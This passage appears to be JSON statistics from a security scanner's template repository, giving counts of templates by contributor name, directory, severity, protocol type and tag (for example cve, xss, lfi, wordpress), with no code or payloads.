edoardottt","count":36},{"name":"c-sh0","count":32},{"name":"adam crosser","count":31},{"name":"theamanrawat","count":31},{"name":"righettod","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"random-robbie","count":13},{"name":"tenbird","count":13},{"name":"sharath","count":13},{"name":"johnk3r","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"dogasantos","count":11},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"ricardomaia","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"zh","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"lu4nx","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"leovalcante","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"amit-jd","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"iamnoooob","count":6},{"name":"rootxharsh","count":6},{"name":"gitlab red team","count":6},{"name":"evan rubinstein","count":6},{"name":"__fazal","count":6},{"name":"pentest_swissky","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"_0xf4n9x_","count":6},{"name":"forgedhallpass","count":6},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"puzzlepeaches","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"nodauf","count":5},{"name":"clem9669","count":5},{"name":"its0x08","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"prajiteshsingh","count":5},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"hardik-solanki","count":4},{"name":"h1ei1","count":4},{"name":"tanq16","count":4},{"name":"0xlittleboy","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"robotshell","count":4},{"name":"powerexploit","count":4},{"name":"shine","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lucasljm2001","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":3},{"name":"jarijaas","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"lark-lab","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"0w4ys","count":3},{"name":"unstabl3","count":3},{"name":"davidmckennirey","count":3},{"name":"kh4sh3i","count":3},{"name":"ph33r","count":3},{"name":"atomiczsec","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"skeltavik","count":3},{"name":"swissky","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"supras","count":3},{"name":"me9187","count":3},{"name":"splint3r7","count":3},{"name":"f1tz","count":3},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"dudez","count":3},{"name":"mr-xn","count":3},{"name":"impramodsargar","count":3},{"name":"nvn1729","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"r12w4n","count":2},{"name":"0xcrypto","count":2},{"name":"dahse89","count":2},{"name":"joeldeleep","count":2},{"name":"ree4pwn","count":2},{"name":"koti2","count":2},{"name":"bananabr","count":2},{"name":"socketz","count":2},{"name":"smaranchand","count":2},{"name":"zomsop82","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"d4vy","count":2},{"name":"dbrwsky","count":2},{"name":"vsh00t","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"ajaysenr","count":2},{"name":"danielmofer","count":2},{"name":"amsda","count":2},{"name":"notnotnotveg","count":2},{"name":"y4er","count":2},{"name":"gevakun","count":2},{"name":"z0ne","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"afaq","count":2},{"name":"666asd","count":2},{"name":"g4l1t0","count":2},{"name":"0xsapra","count":2},{"name":"codexlynx","count":2},{"name":"joshlarsen","count":2},{"name":"udit_thakkur","count":2},{"name":"gal nagli","count":2},{"name":"v0idc0de","count":2},{"name":"thardt-praetorian","count":2},{"name":"badboycxcc","count":2},{"name":"x1m_martijn","count":2},{"name":"redteambrasil","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"clarkvoss","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"korteke","count":2},{"name":"0xprial","count":2},{"name":"paradessia","count":2},{"name":"paperpen","count":2},{"name":"n-thumann","count":2},{"name":"dheerajmadhukar","count":2},{"name":"raesene","count":2},{"name":"evergreencartoons","count":2},{"name":"hackerarpan","count":2},{"name":"pxmme1337","count":2},{"name":"taielab","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bernardofsr","count":2},{"name":"thezakman","count":2},{"name":"k11h-de","count":2},{"name":"canberbamber","count":2},{"name":"true13","count":2},{"name":"sy3omda","count":2},{"name":"randomrobbie","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"myztique","count":2},{"name":"0xnirvana","count":2},{"name":"uomogrande","count":2},{"name":"geekby","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"vavkamil","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"martincodes-de","count":2},{"name":"s0obi","count":2},{"name":"nuk3s3c","count":2},{"name":"sbani","count":2},{"name":"0xrudra","count":2},{"name":"manas_harsh","count":2},{"name":"w4cky_","count":2},{"name":"cckuakilong","count":2},{"name":"fabaff","count":2},{"name":"wa1tf0rme","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"kre80r","count":2},{"name":"8arthur","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"github.com/its0x08","count":2},{"name":"kishore-hariram","count":2},{"name":"convisoappsec","count":2},{"name":"luci","count":2},{"name":"rodnt","count":1},{"name":"remonsec","count":1},{"name":"manuelbua","count":1},{"name":"ahmetpergamum","count":1},{"name":"shivampand3y","count":1},{"name":"elitebaz","count":1},{"name":"xshuden","count":1},{"name":"0xceba","count":1},{"name":"erethon","count":1},{"name":"furkansenan","count":1},{"name":"bartu utku sarp","count":1},{"name":"queencitycyber","count":1},{"name":"lingtren","count":1},{"name":"mantissts","count":1},{"name":"s1r1u5_","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"chron0x","count":1},{"name":"pascalheidmann","count":1},{"name":"manasmbellani","count":1},{"name":"screamy","count":1},{"name":"_harleo","count":1},{"name":"droberson","count":1},{"name":"fq_hsu","count":1},{"name":"udyz","count":1},{"name":"becivells","count":1},{"name":"mrcl0wnlab","count":1},{"name":"dale clarke","count":1},{"name":"b0yd","count":1},{"name":"0xrod","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sickwell","count":1},{"name":"philippdelteil","count":1},{"name":"momen eldawakhly","count":1},{"name":"geraldino2","count":1},{"name":"stupidfish","count":1},{"name":"hexcat","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"infosecsanyam","count":1},{"name":"marcos_iaf","count":1},{"name":"dk999","count":1},{"name":"theabhinavgaur","count":1},{"name":"kiransau","count":1},{"name":"miroslavsotak","count":1},{"name":"miryangjung","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"cookiehanhoan","count":1},{"name":"tirtha_mandal","count":1},{"name":"arjunchandarana","count":1},{"name":"hakluke","count":1},{"name":"luskabol","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ph33rr","count":1},{"name":"dievus","count":1},{"name":"jcockhren","count":1},{"name":"lixts","count":1},{"name":"hanlaomo","count":1},{"name":"jna1","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ofjaaah","count":1},{"name":"noraj","count":1},{"name":"wabafet","count":1},{"name":"adrianmf","count":1},{"name":"fopina","count":1},{"name":"jeya.seelan","count":1},{"name":"sshell","count":1},{"name":"shockwave","count":1},{"name":"evan rubinstien","count":1},{"name":"harshinsecurity","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"flag007","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"florianmaak","count":1},{"name":"akash.c","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kaizensecurity","count":1},{"name":"tehtbl","count":1},{"name":"rotemreiss","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"nielsing","count":1},{"name":"y0no","count":1},{"name":"bughuntersurya","count":1},{"name":"pjborah","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"spac3wh1te","count":1},{"name":"rojanrijal","count":1},{"name":"paper-pen","count":1},{"name":"1nf1n7y","count":1},{"name":"shelld3v","count":1},{"name":"ling","count":1},{"name":"opencirt","count":1},{"name":"p-l-","count":1},{"name":"retr0","count":1},{"name":"micha3lb3n","count":1},{"name":"imhunterand","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"pdp","count":1},{"name":"couskito","count":1},{"name":"exceed","count":1},{"name":"narluin","count":1},{"name":"compr00t","count":1},{"name":"b0rn2r00t","count":1},{"name":"schniggie","count":1},{"name":"yashgoti","count":1},{"name":"b4uh0lz","count":1},{"name":"elder tao","count":1},{"name":"charanrayudu","count":1},{"name":"tea","count":1},{"name":"sak1","count":1},{"name":"ramkrishna sawant","count":1},{"name":"francescocarlucci","count":1},{"name":"kabirsuda","count":1},{"name":"ilovebinbash","count":1},{"name":"akshansh","count":1},{"name":"igibanez","count":1},{"name":"duty_1g","count":1},{"name":"secthebit","count":1},{"name":"soyelmago","count":1},{"name":"_c0wb0y_","count":1},{"name":"wlayzz","count":1},{"name":"whynotke","count":1},{"name":"anon-artist","count":1},{"name":"httpvoid","count":1},{"name":"unkl4b","count":1},{"name":"ldionmarcil","count":1},{"name":"0xtavian","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"mhdsamx","count":1},{"name":"phyr3wall","count":1},{"name":"aaronchen0","count":1},{"name":"rschio","count":1},{"name":"aringo","count":1},{"name":"co0nan","count":1},{"name":"x6263","count":1},{"name":"yavolo","count":1},{"name":"furkansayim","count":1},{"name":"iphantasmic","count":1},{"name":"absshax","count":1},{"name":"noamrathaus","count":1},{"name":"natto97","count":1},{"name":"lethargynavigator","count":1},{"name":"j33n1k4","count":1},{"name":"shreyapohekar","count":1},{"name":"0xceeb","count":1},{"name":"jaimin gondaliya","count":1},{"name":"exid","count":1},{"name":"zandros0","count":1},{"name":"alex","count":1},{"name":"petruknisme","count":1},{"name":"jbaines-r7","count":1},{"name":"noobexploiter","count":1},{"name":"alevsk","count":1},{"name":"liquidsec","count":1},{"name":"open-sec","count":1},{"name":"majidmc2","count":1},{"name":"iampritam","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ohlinge","count":1},{"name":"xstp","count":1},{"name":"streetofhackerr007","count":1},{"name":"caon","count":1},{"name":"patralos","count":1},{"name":"kurohost","count":1},{"name":"calumjelrick","count":1},{"name":"8authur","count":1},{"name":"un-fmunozs","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"gboddin","count":1},{"name":"xeldax","count":1},{"name":"andirrahmani1","count":1},{"name":"0xteles","count":1},{"name":"izn0u","count":1},{"name":"thelicato","count":1},{"name":"nobody","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"rubina119","count":1},{"name":"ola456","count":1},{"name":"nerrorsec","count":1},{"name":"official_blackhat13","count":1},{"name":"arall","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"jbertman","count":1},{"name":"udinchan","count":1},{"name":"jaskaran","count":1},{"name":"lark lab","count":1},{"name":"af001","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"_darrenmartyn","count":1},{"name":"blckraven","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lrtk-coder","count":1},{"name":"omarkurt","count":1},{"name":"megamansec","count":1},{"name":"sinkettu","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kr1shna4garwal","count":1},{"name":"lamscun","count":1},{"name":"justmumu","count":1},{"name":"hardik-rathod","count":1},{"name":"elmahdi","count":1},{"name":"f1she3","count":1},{"name":"piyushchhiroliya","count":1},{"name":"skylark-lab","count":1},{"name":"danigoland","count":1},{"name":"affix","count":1},{"name":"rivalsec","count":1},{"name":"thevillagehacker","count":1},{"name":"ahmed sherif","count":1},{"name":"thebinitghimire","count":1},{"name":"tim_koopmans","count":1},{"name":"alperenkesk","count":1},{"name":"alexrydzak","count":1},{"name":"jiheon-dev","count":1},{"name":"rotembar","count":1},{"name":"nagli","count":1},{"name":"arm!tage","count":1},{"name":"nytr0gen","count":1},{"name":"0xh7ml","count":1},{"name":"mass0ma","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0h1in9e","count":1},{"name":"aresx","count":1},{"name":"evolutionsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"notsoevilweasel","count":1},{"name":"retr02332","count":1},{"name":"viondexd","count":1},{"name":"luqmaan hadia","count":1},{"name":"pudsec","count":1},{"name":"c3l3si4n","count":1},{"name":"brabbit10","count":1},{"name":"5up3r541y4n","count":1},{"name":"jteles","count":1},{"name":"mubassirpatel","count":1},{"name":"kareemse1im","count":1},{"name":"regala_","count":1},{"name":"exploitation","count":1},{"name":"jeya seelan","count":1},{"name":"d0rkerdevil","count":1},{"name":"kailashbohara","count":1},{"name":"push4d","count":1},{"name":"sherlocksecurity","count":1},{"name":"prettyboyaaditya","count":1},{"name":"act1on3","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"osamahamad","count":1},{"name":"ggranjus","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ipanda","count":1},{"name":"djoevanka","count":1},{"name":"mah3sec_","count":1},{"name":"th3.d1p4k","count":1},{"name":"orpheus","count":1},{"name":"juicypotato1","count":1},{"name":"breno_css","count":1},{"name":"borna nematzadeh","count":1},{"name":"daviey","count":1},{"name":"ptonewreckin","count":1},{"name":"vinit989","count":1},{"name":"willd96","count":1},{"name":"arr0way","count":1},{"name":"viniciuspereiras","count":1},{"name":"luqman","count":1},{"name":"oscarintherocks","count":1},{"name":"ok_bye_now","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"bywalks","count":1},{"name":"pratik khalane","count":1},{"name":"kiks7","count":1},{"name":"w0tx","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"elouhi","count":1},{"name":"dhiyaneshdki","count":1},{"name":"husain","count":1},{"name":"tirtha","count":1},{"name":"yashanand155","count":1},{"name":"vzamanillo","count":1},{"name":"davidfegyver","count":1},{"name":"pry0cc","count":1},{"name":"allenwest24","count":1},{"name":"revblock","count":1},{"name":"realexp3rt","count":1},{"name":"ransomsec","count":1},{"name":"zsusac","count":1},{"name":"shiar","count":1},{"name":"jas37","count":1},{"name":"yuansec","count":1},{"name":"intx0x80","count":1},{"name":"hakimkt","count":1},{"name":"zinminphy0","count":1},{"name":"fmunozs","count":1},{"name":"maximus decimus","count":1},{"name":"qlkwej","count":1},{"name":"mesaglio","count":1},{"name":"andysvints","count":1},{"name":"0xd0ff9","count":1},{"name":"h4kux","count":1},{"name":"makyotox","count":1},{"name":"amanrawat","count":1},{"name":"2rs3c","count":1},{"name":"jrolf","count":1},{"name":"aayush vishnoi","count":1},{"name":"deena","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"amnotacat","count":1},{"name":"daffianfo","count":1}],"directory":[{"name":"cves","count":1528},{"name":"exposed-panels","count":780},{"name":"vulnerabilities","count":519},{"name":"misconfiguration","count":361},{"name":"technologies","count":319},{"name":"exposures","count":308},{"name":"token-spray","count":236},{"name":"workflows","count":190},{"name":"default-logins","count":116},{"name":"file","count":78},{"name":"takeovers","count":69},{"name":"network","count":63},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1666},{"name":"high","count":1152},{"name":"medium","count":835},{"name":"critical","count":552},{"name":"low","count":281},{"name":"unknown","count":25}],"types":[{"name":"http","count":4323},{"name":"file","count":78},{"name":"network","count":77},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1552},{"name":"panel","count":780},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":543},{"name":"lfi","count":519},{"name":"wordpress","count":471},{"name":"cve2021","count":370},{"name":"wp-plugin","count":366},{"name":"tech","count":360},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":266},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":224},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":188},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":121},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"files","count":92},{"name":"router","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"takeover","count":75},{"name":"devops","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":71},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"cve2015","count":47},{"name":"fileupload","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"hackerone","count":39},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"atlassian","count":38},{"name":"debug","count":37},{"name":"tenable","count":36},{"name":"springboot","count":35},{"name":"traversal","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"huntr","count":31},{"name":"listing","count":31},{"name":"kubernetes","count":30},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"cnvd","count":25},{"name":"sap","count":25},{"name":"microsoft","count":25},{"name":"misc","count":23},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"aws","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"api","count":21},{"name":"zoho","count":21},{"name":"manageengine","count":21},{"name":"cve2012","count":21},{"name":"wp-theme","count":21},{"name":"cloud","count":20},{"name":"weblogic","count":20},{"name":"tomcat","count":19},{"name":"k8s","count":19},{"name":"camera","count":19},{"name":"ibm","count":19},{"name":"cicd","count":19},{"name":"deserialization","count":19},{"name":"gitlab","count":18},{"name":"dlink","count":18},{"name":"firewall","count":17},{"name":"service","count":17},{"name":"jenkins","count":17},{"name":"wavlink","count":17},{"name":"struts","count":17},{"name":"ftp","count":16},{"name":"printer","count":16},{"name":"nginx","count":15},{"name":"xxe","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"fortinet","count":15},{"name":"java","count":14},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"android","count":14},{"name":"confluence","count":13},{"name":"woocommerce","count":13},{"name":"cve2008","count":13},{"name":"status","count":13},{"name":"msf","count":13},{"name":"amazon","count":13},{"name":"abstractapi","count":13},{"name":"cve2013","count":13},{"name":"lfr","count":13},{"name":"magento","count":13},{"name":"drupal","count":12},{"name":"microweber","count":12},{"name":"github","count":12},{"name":"netgear","count":12},{"name":"rails","count":12},{"name":"fortigate","count":12},{"name":"vpn","count":12},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"webserver","count":11},{"name":"zyxel","count":11},{"name":"azure","count":11},{"name":"ssl","count":11},{"name":"cnvd2021","count":11},{"name":"backdoor","count":11},{"name":"mail","count":11},{"name":"cisa","count":11},{"name":"airflow","count":11},{"name":"laravel","count":10},{"name":"django","count":10},{"name":"git","count":10},{"name":"dell","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"ruby","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"coldfusion","count":10},{"name":"ssti","count":9},{"name":"fastjson","count":9},{"name":"kube","count":9},{"name":"phpmyadmin","count":9},{"name":"prometheus","count":9},{"name":"windows","count":9},{"name":"ssh","count":9},{"name":"zimbra","count":9},{"name":"versa","count":9},{"name":"vcenter","count":9},{"name":"sonicwall","count":9},{"name":"dedecms","count":9},{"name":"iis","count":9},{"name":"zabbix","count":9},{"name":"wso2","count":9},{"name":"symfony","count":8},{"name":"audit","count":8},{"name":"npm","count":8},{"name":"config-audit","count":8},{"name":"solarview","count":8},{"name":"jetbrains","count":8},{"name":"elasticsearch","count":8},{"name":"bucket","count":8},{"name":"recon","count":8},{"name":"kafka","count":8},{"name":"auth","count":8},{"name":"scada","count":8},{"name":"citrix","count":8},{"name":"metadata","count":8},{"name":"cisco-switch","count":8},{"name":"jboss","count":8},{"name":"headless","count":8},{"name":"mirai","count":8},{"name":"solr","count":8},{"name":"hms","count":8},{"name":"maps","count":7},{"name":"go","count":7},{"name":"firebase","count":7},{"name":"blind","count":7},{"name":"opencats","count":7},{"name":"ognl","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"icewarp","count":7},{"name":"druid","count":7},{"name":"exchange","count":7},{"name":"microstrategy","count":6},{"name":"huawei","count":6},{"name":"cobbler","count":6},{"name":"websphere","count":6},{"name":"slack","count":6},{"name":"fpd","count":6},{"name":"liferay","count":6},{"name":"emerge","count":6},{"name":"vms","count":6},{"name":"admin","count":6},{"name":"setup","count":6},{"name":"enum","count":6},{"name":"smtp","count":6},{"name":"moodle","count":6},{"name":"kubelet","count":6},{"name":"jamf","count":6},{"name":"cache","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"jetty","count":6},{"name":"activemq","count":6},{"name":"artica","count":6},{"name":"elfinder","count":6},{"name":"thinkphp","count":6},{"name":"node","count":6},{"name":"zhiyuan","count":6},{"name":"lucee","count":6},{"name":"opensis","count":6},{"name":"rconfig","count":6},{"name":"magmi","count":6},{"name":"openvpn","count":6},{"name":"bigip","count":6},{"name":"ecology","count":6},{"name":"sitecore","count":6},{"name":"bypass","count":6},{"name":"db","count":6},{"name":"elastic","count":5},{"name":"minio","count":5},{"name":"filemanager","count":5},{"name":"gogs","count":5},{"name":"keycloak","count":5},{"name":"gocd","count":5},{"name":"parallels","count":5},{"name":"nagios","count":5},{"name":"mongodb","count":5},{"name":"74cms","count":5},{"name":"firmware","count":5},{"name":"error","count":5},{"name":"solarwinds","count":5},{"name":"alibaba","count":5},{"name":"rseenet","count":5},{"name":"fortios","count":5},{"name":"apisix","count":5},{"name":"s3","count":5},{"name":"symantec","count":5},{"name":"carrental","count":5},{"name":"prestashop","count":5},{"name":"redis","count":5},{"name":"avideo","count":5},{"name":"scan","count":5},{"name":"plesk","count":5},{"name":"leak","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"circarlife","count":5},{"name":"rfi","count":5},{"name":"cockpit","count":5},{"name":"storage","count":5},{"name":"strapi","count":5},{"name":"database","count":5},{"name":"vbulletin","count":5},{"name":"awstats","count":5},{"name":"openemr","count":4},{"name":"sangfor","count":4},{"name":"redmine","count":4},{"name":"artifactory","count":4},{"name":"terramaster","count":4},{"name":"candidats","count":4},{"name":"httpserver","count":4},{"name":"hashicorp","count":4},{"name":"console","count":4},{"name":"zte","count":4},{"name":"search","count":4},{"name":"telerik","count":4},{"name":"hpe","count":4},{"name":"phppgadmin","count":4},{"name":"hoteldruid","count":4},{"name":"beyondtrust","count":4},{"name":"sendgrid","count":4},{"name":"wcs","count":4},{"name":"puppet","count":4},{"name":"cve2007","count":4},{"name":"tikiwiki","count":4},{"name":"ampache","count":4},{"name":"kentico","count":4},{"name":"cnvd2019","count":4},{"name":"vrealize","count":4},{"name":"springcloud","count":4},{"name":"prtg","count":4},{"name":"nexus","count":4},{"name":"roxy","count":4},{"name":"stripe","count":4},{"name":"asp","count":4},{"name":"royalevent","count":4},{"name":"aspose","count":4},{"name":"sophos","count":4},{"name":"flink","count":4},{"name":"jellyfin","count":4},{"name":"cacti","count":4},{"name":"kevinlab","count":4},{"name":"bmc","count":4},{"name":"gnuboard","count":4},{"name":"linkerd","count":4},{"name":"telesquare","count":4},{"name":"panos","count":4},{"name":"voip","count":4},{"name":"oauth","count":4},{"name":"kibana","count":4},{"name":"tenda","count":4},{"name":"couchdb","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"ems","count":4},{"name":"hybris","count":4},{"name":"xmlrpc","count":4},{"name":"mailchimp","count":4},{"name":"gitea","count":4},{"name":"rabbitmq","count":4},{"name":"dropbear","count":4},{"name":"oa","count":4},{"name":"axigen","count":4},{"name":"horde","count":4},{"name":"paypal","count":4},{"name":"nosqli","count":4},{"name":"caucho","count":4},{"name":"sonarqube","count":4},{"name":"yeswiki","count":4},{"name":"postmessage","count":4},{"name":"phpinfo","count":4},{"name":"adminer","count":4},{"name":"hikvision","count":4},{"name":"resin","count":4},{"name":"photo","count":4},{"name":"ruckus","count":4},{"name":"umbraco","count":4},{"name":"sql","count":4},{"name":"typo3","count":4},{"name":"jeesns","count":3},{"name":"goanywhere","count":3},{"name":"splunk","count":3},{"name":"bitbucket","count":3},{"name":"fileman","count":3},{"name":"fuelcms","count":3},{"name":"kingsoft","count":3},{"name":"graylog","count":3},{"name":"ampps","count":3},{"name":"httpd","count":3},{"name":"movable","count":3},{"name":"eshop","count":3},{"name":"bigant","count":3},{"name":"pfsense","count":3},{"name":"subrion","count":3},{"name":"thruk","count":3},{"name":"axis","count":3},{"name":"codeigniter","count":3},{"name":"netlify","count":3},{"name":"flexvnf","count":3},{"name":"openstack","count":3},{"name":"wordfence","count":3},{"name":"redash","count":3},{"name":"axis2","count":3},{"name":"webadmin","count":3},{"name":"microfocus","count":3},{"name":"blockchain","count":3},{"name":"influxdb","count":3},{"name":"kkfileview","count":3},{"name":"panabit","count":3},{"name":"rlm","count":3},{"name":"drawio","count":3},{"name":"grav","count":3},{"name":"pip","count":3},{"name":"steve","count":3},{"name":"finecms","count":3},{"name":"sentry","count":3},{"name":"square","count":3},{"name":"superadmin","count":3},{"name":"mikrotik","count":3},{"name":"intercom","count":3},{"name":"pentaho","count":3},{"name":"mautic","count":3},{"name":"jfrog","count":3},{"name":"webmin","count":3},{"name":"smb","count":3},{"name":"consul","count":3},{"name":"ec2","count":3},{"name":"teamcity","count":3},{"name":"clusterengine","count":3},{"name":"rackn","count":3},{"name":"webmail","count":3},{"name":"openam","count":3},{"name":"sharepoint","count":3},{"name":"bitrix","count":3},{"name":"3cx","count":3},{"name":"globalprotect","count":3},{"name":"dreambox","count":3},{"name":"digitalocean","count":3},{"name":"yonyou","count":3},{"name":"odoo","count":3},{"name":"elementor","count":3},{"name":"epson","count":3},{"name":"linksys","count":3},{"name":"labkey","count":3},{"name":"digitalrebar","count":3},{"name":"dotcms","count":3},{"name":"seagate","count":3},{"name":"pega","count":3},{"name":"dom","count":3},{"name":"selenium","count":3},{"name":"netdata","count":3},{"name":"samba","count":3},{"name":"weiphp","count":3},{"name":"mongo","count":3},{"name":"metabase","count":3},{"name":"cloudflare","count":3},{"name":"concrete","count":3},{"name":"selea","count":3},{"name":"zend","count":3},{"name":"thinfinity","count":3},{"name":"aptus","count":3},{"name":"lansweeper","count":3},{"name":"telnet","count":3},{"name":"centos","count":3},{"name":"lotus","count":3},{"name":"unifi","count":3},{"name":"trendnet","count":3},{"name":"getsimple","count":3},{"name":"httpbin","count":3},{"name":"mcafee","count":3},{"name":"openfire","count":3},{"name":"cve2005","count":3},{"name":"ivanti","count":3},{"name":"zeroshell","count":3},{"name":"r-seenet","count":3},{"name":"jupyter","count":3},{"name":"targa","count":3},{"name":"ansible","count":3},{"name":"proftpd","count":3},{"name":"geoserver","count":3},{"name":"bruteforce","count":3},{"name":"matrix","count":3},{"name":"fanruan","count":3},{"name":"mantisbt","count":3},{"name":"sugarcrm","count":3},{"name":"key","count":3},{"name":"express","count":3},{"name":"octobercms","count":3},{"name"